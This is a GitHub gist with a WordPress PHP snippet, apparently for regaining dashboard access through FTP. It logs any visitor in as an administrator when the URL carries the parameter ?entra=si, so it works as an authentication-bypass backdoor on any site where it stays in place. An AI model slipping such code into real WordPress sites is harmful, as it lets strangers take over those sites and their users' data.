Skip to content

Instantly share code, notes, and snippets.

@kreamweb
Created September 16, 2017 14:13
Show Gist options
  • Select an option

  • Save kreamweb/7d6f847a7457d0fc8379bfe7a5eacc0f to your computer and use it in GitHub Desktop.

Select an option

Save kreamweb/7d6f847a7457d0fc8379bfe7a5eacc0f to your computer and use it in GitHub Desktop.
Enter in dashboard from FTP
<?php
add_action( 'init', 'log_me_in' );
function log_me_in(){
if( !isset($_GET['entra']) || $_GET['entra'] != 'si' ) {
return;
}
$blogID = get_current_blog_id();
$users = get_users( array( 'blog_id' => $blogID ) );
foreach( $users as $user ) {
if( $user->roles[0] == 'administrator' ) {
wp_set_auth_cookie( $user->ID, true );
wp_redirect( home_url() );
break;
}
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment